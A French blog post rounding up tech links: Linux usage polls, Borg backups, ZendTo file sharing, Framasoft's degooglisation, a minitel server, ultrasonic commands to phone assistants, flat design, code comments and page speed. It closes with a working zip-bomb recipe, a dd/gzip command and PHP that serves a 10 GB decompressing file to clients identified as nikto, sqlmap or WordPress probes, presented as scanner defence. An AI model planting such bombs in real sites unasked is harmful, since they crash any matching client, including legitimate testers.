En voilà des podiums qui sont intéressants.
LinuxQuestions.org établit des sondages pour déterminer les applications les plus utilisées par catégorie. Par exemple Ubuntu est la plus utilisée alors Slackware plutôt pour le serveur, et ainsi de suite.
Ici les résultats des sondages de manière individuelle, et là de jolis graphiques pour centraliser tout ça.
Genma nous donne son retour sur Borg, un outil de sauvegarde que j’avais en ligne de mire. Toujours intéressant à avoir car il contient des liens utiles.
Pour ceux qui ont déjà du échanger des gros fichiers, vous avez sûrement connu http://dl.free.fr/ ou encore https://wetransfer.com/, ou pour les libristes, la version de chez Framasoft Framadrop.
Eh bien pour ceux qui comme moi aiment bien avoir leur propre outil pour savoir ce qu’on utilise ou où sont nos fichiers, il existe ZendTo, un petit service à installer sur son serveur et qui est pas mal configurable (LDAP, AD…).
Dégooglisons Internet, c’est le message que veut faire passer Framasoft depuis 3 ans (petit retour d’expérience ici). Acte pas facile, tellement nous sommes habitués et soumis aux services des GAFAM.
Mais la tentative est louable et courageuse, et un site existe et a au moins le mérite de proposer des alternatives. Il peut toujours être utile des fois de chercher une alternative qui peut être simple à mettre en place, ou utiliser un service de Framasoft basé sur une solution libre que de passer par un gros avec les inconvénients que ça engendre (vos données sont à leur disposition, vous pouvez tout perdre du jour au lendemain, bref…).
A essayer !
Je ne peux pas résister à partager ceci, le minitel ayant été pour moi la découverte de ce mélange d’informatique, de communication, de réseaux sociaux, bref, c’est toujours une petite nostalgie quand je vois quelque chose tourner autour du minitel.
Jelora a donc reproduit un serveur minitel, fonctionnel et nous fait partager ses éléments sur son blog. Je pense que cela intéressera aussi mes amis électroniciens.
Autant il peut se passer des semaines sans que je n’ai rien à partager ou à relayer, autant des fois je tombe sur plusieurs sujets intéressants pour lesquels il faut que je trouve du temps pour qu’ils ne tombent pas dans mon panier.
Je m’étais déjà posé la question comment peut-on configurer certains objets connectés alors qu’on n’a aucun accès dessus, la réponse est dans les ultrasons.
Là où ça devient intéressant, c’est que nos bons et très chers (et chers) téléphones écoutent (siri, ok google, bixby…) jusqu’à des fréquences que nous n’entendons pas (notre oreille ne pouvant entendre que jusque 20 kHz), et qu’un haut-parleur peut envoyer des ultrasons. Le détournement est qu’avec cet usage, une publicité peut par exemple envoyer un message, que notre téléphone interprétera et pourra alors aller sur un siteweb, ou composer un téléphone.
developpez.com relaie une étude intéressante comme quoi les sites web en Flat Design seraient moins intuitifs et ergonomiques que ces bons vieux designs ombragés.
Je relativise l’article de developpez.com car l’exemple n’est clairement pas très parlant, et il faut se rendre sur l’article original pour mieux comprendre et voir l’analyse (c’est sur qu’un bouton blanc sur fonc blanc, c’est pas très parlant, flat design ou pas… d’où tous les commentaires qui s’en suivent).
Google apporte son point de vue sur l’usage des fois trop exagéré des commentaires.
J’ai eu un stagiaire une fois qui était surpris du peu de commentaire dans un de mes codes. Je lui ai demandé en regardant plus en détail ce que je pouvais commenter car mes noms de fonctions, de variables étaient suffisants.
J’ai un collègue qui use et abuse des commentaires. Quel intérêt de ce type par exemple ?
// Get all users.
userService.getAllUsers();
A utiliser avec précaution.
Korben nous met à disposition une page qui permet de faire un rappel sur les bonnes pratiques pour améliorer la vitesse de chargement d’une page web.
Toujours aussi énervant quand on voit qu’une page met une éternité à s’afficher, sous prétexte que nos ordinateurs sont de plus en plus rapides. Or il peut arriver qu’on ait besoin d’accéder à cette page depuis un mobile avec un réseau pas au top de sa forme, ou chez quelqu’un qui a une connexion moyenne (eh oui tout le monde n’a pas la fibre ou un ADSL en débit max).
Bref on y retrouve quelques mots-clés, et des solutions qui passent d’abord par l’audit du site, par le cache du serveur, ou diverses balises à ajouter.
A appliquer !
Pif paf pouf, et… zip !
Hop, petit code pour créer une zip bomb du blog de Haschek :
dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip
Avec ça vous créez un fichier zippé qui fera 10 Go une fois décompressé.
L’intérêt est de le transmettre via votre serveur web par ce code PHP par exemple :
<?php
//prepare the client to recieve GZIP data. This will not be suspicious
//since most web servers use GZIP by default
header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));
//Turn off output buffering
if (ob_get_level()) ob_end_clean();
//send the gzipped file to the client
readfile('10G.gzip');
Puis d’insérer le script suivant sur une de vos pages pour transmettre ce fichier :
<?php
$agent = filter_input(INPUT_SERVER, 'HTTP_USER_AGENT');
//check for nikto, sql map or "bad" subfolders which only exist on wordpress
if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/'))
{
sendBomb();
exit();
}
function sendBomb(){
//prepare the client to recieve GZIP data. This will not be suspicious
//since most web servers use GZIP by default
header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));
//Turn off output buffering
if (ob_get_level()) ob_end_clean();
//send the gzipped file to the client
readfile('10G.gzip');
}
function startsWith($a, $b) {
return strpos($a, $b) === 0;
}
Et avec ceci les scanners de vulnérabilités chercheront à ouvrir le fichier et planteront.